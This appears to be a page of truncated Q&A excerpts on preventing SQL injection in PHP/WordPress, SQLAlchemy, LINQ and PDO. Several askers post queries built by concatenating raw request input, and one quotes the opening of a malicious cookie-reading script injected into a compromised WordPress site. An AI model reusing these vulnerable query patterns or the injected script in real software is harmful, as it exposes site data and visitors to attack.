sql-injection

I'm currently using the following query to get values in mysql using php: The code is working, but now I'm worried about sql injections. How to prevent SQL injection? <?php include_once("wp-config.php"); @$gameid = $_GET['gameid']; global $wpdb; $fivesdrafts = $wpdb->get_results( " SELECT ID FROM $wpdb->posts WHERE ID = ".$gameid." " ); ?> is this safe? <?php include_once("wp-config.php"); @$gameid = mysql_real_escape_string($_GET['gameid']); global $wpdb; $fivesdrafts = $wpdb->get_results( $wpdb->prepare( " SELECT ID FROM $wpdb->posts WHERE ID = %d", ".$gameid.") ); ?> From the WordPress

I have the following query that uses like to search a blog. I am not sure if I'm making myself vulnerable to a SQL injection attack if I do this. How is SQLAlchemy handling this? Is it safe? search_results = Blog.query.with_entities(Blog.blog_title).filter(Blog.blog_title.like("%"+ searchQuery['queryText'] +"%")).all() The underlying db-api library for whatever database you're using (sqlite3, psycopg2, etc.) escapes parameters. SQLAlchemy simply passes the statement and parameters to execute , the driver does whatever is needed. Assuming you are not writing raw SQL that includes parameters

I've got a situation where I need to use LINQ's ExecuteCommand method to run an insert. Something like (simplified for purposes of this question): object[] oParams = { Guid.NewGuid(), rec.WebMethodID }; TransLogDataContext.ExecuteCommand ( "INSERT INTO dbo.Transaction_Log (ID, WebMethodID) VALUES ({0}, {1})", oParams); The question is if this is SQL injection proof in the same way parameterized queries are? Did some research, and I found this: In my simple testing, it looks like the parameters passed in the ExecuteQuery and ExecuteCommand methods are automatically SQL encoded based on the

I am looking for a tool that can detect malicious requests (such as obvious SQL injection gets or posts) and will immediately ban the IP address of the requester/add to a blacklist. I am aware that in an ideal world our code should be able to handle such requests and treat them accordingly, but there is a lot of value in such a tool even when the site is safe from these kinds of attacks, as it can lead to saving bandwidth, preventing bloat of analytics, etc. Ideally, I'm looking for a cross-platform ( LAMP/.NET ) solution that sits at a higher level than the technology stack; perhaps at the

So I've been trying to replicate a second order SQL Injection. Here's an example template of two php based sites that I've prepared. Let's just call it a voter registration form. A user can register and then you can check if you're a registered voter or not. insert.php <?php $db_selected = mysql_select_db('canada',$conn); if (!db_selected) die("can't use mysql: ". mysql_error()); $sql_statement = "INSERT into canada (UserID,FirstName,LastName,Age,State,Town) values ('".mysql_real_escape_string($_REQUEST["UserID"])."', '".mysql_real_escape_string($_REQUEST["FirstName"])."', '".mysql_real_escape

I had a plugin that made my Wordpress site vulnerable to SQL injection attack. I've since locked down my site and removed all Wordpress files then reinstalled Wordpress. The plugin has also since been removed. Unfortunately I now have all 2503 posts with the following example script installed: <!--codes_iframe--> <script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64

I'm studying SQL injection and tried in my PHP code this query: $condition = str_replace(["'","\\"],["\\'","\\\\"], @$_GET['q']); $query = "SELECT * FROM dummy_table WHERE dummy_column = '$condition'"; DB and tables charset is set to UTF8. I can't inject anything, can someone help me please? EDIT: As pointed out by GarethD this would escape first ' and than \, allowing injection, what about this str_replace? $condition = str_replace(["\\","'"],["\\\\","\\'"], @$_GET['q']); Your Common Sense This isolated example is invulnerable to injection. But you have to realize that protection from sql

I've read this before "filter input, escape output" but is filtering input really needed when I use PDO with PHP? I thought with PDO I don't need to filter input because the prepared statement takes care of sql injections. I think "escape output" is still valid, but is "filter input" still valid? Yes, it is still valid. Filtering is not about preventing security vulnerabilities, it's about not populating your database with garbage. If you're expecting a date, make sure it at least looks like a date prior to storing it. Escaping output is about preventing security vulnerabilities (namely XSS or

$id = trim((int)$_GET['id']); $sql = 'SELECT * FROM users WHERE id = ' . $db->quote($id) . ' LIMIT 1'; $run = $db->query($sql)->fetch(); Does PDO's quote method is safe as prepared statements? Or i have to use prepared statements all the way in my script? Basically quote() is safe as prepared statements but it depends on the proper implementation of quote() and of course also on it's consequent usage. Additionally the implementation of the used database system/PDO driver has to be taken into account in order to answer the question. While a prepared statement can be a feature of the underlying

True PHP Security experts, is PDO the way to go or would I be ok with Codeigniter's Active Record class? I have read http://codeigniter.com/forums/viewthread/179618/ and am not 100% convinced. I usually lean on experts such as Chris Shiflett and OWASP for security tips. http://shiflett.org/blog/2006/jul/the-owasp-php-top-5 Been using a homebrewed PDO DB Class in place of the Codeigniter Database files. Everytime I upload it is a relatively small pain to copy over. The main reason I use PDO is to protect from SQL Injection vs using Active Record. EDIT: NOT TO BE A SHILL but I wrote a post after